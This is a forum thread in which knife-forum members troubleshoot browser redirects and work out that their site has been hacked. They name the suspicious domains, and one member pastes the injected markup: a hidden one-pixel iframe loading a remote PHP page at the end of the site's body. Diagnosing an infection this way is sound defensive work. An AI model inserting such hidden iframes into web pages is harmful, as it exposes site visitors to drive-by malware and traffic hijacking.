Quantcast

Redirect problems?

Kitchen Knife Forums

Help Support Kitchen Knife Forums:

Dave Martell

Forum Founder
Professional Craftsman
Reaction score
I have two reports of the site url being redirected automatically. Is anyone having this problem?

Vertigo

Senior Member/ Internet Hooligan
Banned
Reaction score
NoScript blocks attempts for the site to load hXXp:superbesttraf.orge.pl and hXXp:www.cookaround.com -- If you're allowing scripts globally, you're probably allowing those sites too. If you're not sure, watch the bottom of your screen as you load the forum and you will see those sites quickly load as well.

Burl Source

Weird Wood Pusher
Reaction score
Another forum member who uses Safari sent me an email.
Said he is getting redirected to a Flash site as well.

Pensacola Tiger

Founding Member
Supporting Member
Reaction score
Another forum member who uses Safari sent me an email.
Said he is getting redirected to a Flash site as well.
Tell him to use Chrome or Firefox. I haven't been able to figure out how to get Safari to work.

Burl Source

Weird Wood Pusher
Reaction score
I just tried reloading and a couple other addresses are flashing across the bottom of my screen.
I use Firefox. No redirects but the other addresses showed for a fraction of a second at the bottom of my page.

Dave Martell

Forum Founder
Professional Craftsman
Reaction score
I just tried reloading and a couple other addresses are flashing across the bottom of my screen.
I use Firefox. No redirects but the other addresses showed for a fraction of a second at the bottom of my page.

I just tried this and got the same thing. I'm using Chrome which is blocking it but none the less it looks like we have a problems. Stinking hackers.

mr drinky

Founding Member
Supporting Member
Reaction score
Both of my Macs won't properly direct to KKF. I am on an ancient PC right now. My redirects end up at Google, so I assumed it was the Google Redirect Virus. Maybe a file in one of the threads is spreading that virus?

k.

SpikeC

Reaction score
My Mac book is redirecting, butt my iPad is not.

ecchef

Staff member
Founding Member
Global Moderators
Supporting Member
Reaction score
I'm navigating ok, but I do see some bullsh!t www.cookaround.com link flash by. I also now have to double click to back arrow.

mr drinky

Founding Member
Supporting Member
Reaction score
Both of my Macs are working properly now.

k.

UglyJoe

Reaction score
I'm also still having the redirect problems. Safari, here.

Vertigo

Banned
Reaction score
My redirects end up at Google, so I assumed it was the Google Redirect Virus. Maybe a file in one of the threads is spreading that virus?

k.
I don't think this is a Google Redirect Virus thing. It appears for all intents and purposes to be an HTML:Iframe-inf infection, though there could be more going on behind the scenes.

If you're using Chrome, Firefox with NoScript, IE with Java disabled or a Smartphone you should be fine--though I did just get a hit on my IDS an hour or two ago indicating that the orge.pl site was trying to give me a worm. Lulz.

Wrap 'em up, boys.

tk59

Founding Member
Reaction score
I haven't seen anything on IE or Firefox.

SpikeC

Reaction score
This seems to be related to Flash. It is affecting Safari on my Mac book, but not safari on my iPad, which does not allow flash.

mr drinky

Founding Member
Supporting Member
Reaction score
NoScript blocks attempts for the site to load hXXp:superbesttraf.orge.pl
Maybe it is the newest member, PolishAvenger ;) Just kidding, but when this stuff happens, I do sort of think about those crazy threats from MadRookie way back when. I'm sure it has nothing to do with him, but it did cross my mind.

k.

Vertigo

Banned
Reaction score
I haven't seen anything on IE or Firefox.
It may be transparent, but regardless this is what's happening: (right click for big)

Those should most definitely not be there, and the first one (the Iframe infection orge.pl) is possibly malicious. I suspect the second one is just using our traffic to increase it's own impression.

JBroida

Founding Member
KKF Vendor
Reaction score
this is what it is in your code dave:
</div>

</div><div style="display:none"><iframe src="http://www.cookaround.com/cook/robots.php" width="1" height="1"></iframe></div>

</body>

</html>

its right at the end of your pages code before the end of the body

Vertigo

Banned
Reaction score
Can you find where the other one is hiding Jon? I'm not seeing it anywhere.

JBroida

Founding Member
KKF Vendor
Reaction score
i think its hidden in the iframe, but i dont really want to look into that from my home laptop right now

PierreRodrigue

Founding Member
Reaction score
My anti virus just blocked a script trying to open a PM. I aint got no 'puter savy, but it doesn't seem to have dug in.